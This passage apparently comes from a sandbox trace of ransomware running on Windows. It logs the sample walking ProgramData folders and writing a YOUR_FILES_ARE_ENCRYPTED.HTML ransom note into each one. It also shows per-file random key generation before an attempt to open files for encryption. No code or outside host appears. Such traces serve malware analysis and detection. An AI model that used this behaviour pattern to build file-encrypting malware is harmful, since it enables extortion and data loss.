lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.452] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.452] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.452] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0157.452] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\sentitems\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.452] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.455] CloseHandle (hObject=0x5a0) returned 1 [0157.455] GetProcessHeap () returned 0x270000 [0157.456] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.457] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 1 [0157.457] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned 58 [0157.457] GetProcessHeap () returned 0x270000 [0157.457] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.457] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0157.457] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*" [0157.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.458] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.458] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0157.458] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned 64 [0157.458] GetProcessHeap () returned 0x270000 [0157.459] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0157.459] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0157.459] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*" [0157.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0157.460] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.460] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x8994834a, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x15dbe, dwReserved0=0x0, dwReserved1=0x60, cFileName="WelcomeFax.tif", cAlternateFileName="")) returned 1 [0157.460] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif") returned 79 [0157.460] lstrcmpW (lpString1="WelcomeFax.tif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.460] PathFindExtensionW (pszPath="WelcomeFax.tif") returned=".tif" [0157.460] lstrlenW (lpString=".tif") returned 4 [0157.460] PathFindExtensionW (pszPath="WelcomeFax.tif") returned=".tif" [0157.460] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x8994834a, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x15dbe, dwReserved0=0x0, dwReserved1=0x60, cFileName="WelcomeFax.tif", cAlternateFileName="")) returned 0 [0157.461] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0157.461] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0157.461] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.462] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0157.468] CloseHandle (hObject=0x4a8) returned 1 [0157.469] GetProcessHeap () returned 0x270000 [0157.470] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0157.470] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 0 [0157.470] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.470] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0157.471] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.471] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.474] CloseHandle (hObject=0x5a0) returned 1 [0157.475] GetProcessHeap () returned 0x270000 [0157.476] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.476] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 0 [0157.476] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.476] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0157.476] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.477] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.479] CloseHandle (hObject=0x598) returned 1 [0157.480] GetProcessHeap () returned 0x270000 [0157.481] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.481] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSScan", cAlternateFileName="")) returned 1 [0157.481] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan") returned 46 [0157.481] GetProcessHeap () returned 0x270000 [0157.481] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.481] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan" [0157.481] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*" [0157.481] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.482] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.482] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4375095c, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x4375095c, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x4375095c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0x0, dwReserved1=0x60, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 1 [0157.482] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned 62 [0157.482] lstrcmpW (lpString1="WelcomeScan.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.482] PathFindExtensionW (pszPath="WelcomeScan.jpg") returned=".jpg" [0157.482] lstrlenW (lpString=".jpg") returned 4 [0157.482] PathFindExtensionW (pszPath="WelcomeScan.jpg") returned=".jpg" [0157.482] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0157.482] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0157.483] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4375095c, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x4375095c, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x4375095c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0x0, dwReserved1=0x60, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 0 [0157.483] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.483] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0157.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.483] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.486] CloseHandle (hObject=0x598) returned 1 [0157.486] GetProcessHeap () returned 0x270000 [0157.487] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.488] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSScan", cAlternateFileName="")) returned 0 [0157.488] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.488] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0157.488] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.488] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.491] CloseHandle (hObject=0x58c) returned 1 [0157.491] GetProcessHeap () returned 0x270000 [0157.492] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.498] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WwanSvc", cAlternateFileName="")) returned 1 [0157.498] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc") returned 36 [0157.498] GetProcessHeap () returned 0x270000 [0157.498] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.501] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc" [0157.501] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*" [0157.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.501] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.502] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Profiles", cAlternateFileName="")) returned 1 [0157.502] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles") returned 45 [0157.502] GetProcessHeap () returned 0x270000 [0157.502] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.503] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles" [0157.503] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*" [0157.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.503] FindNextFileW (in: 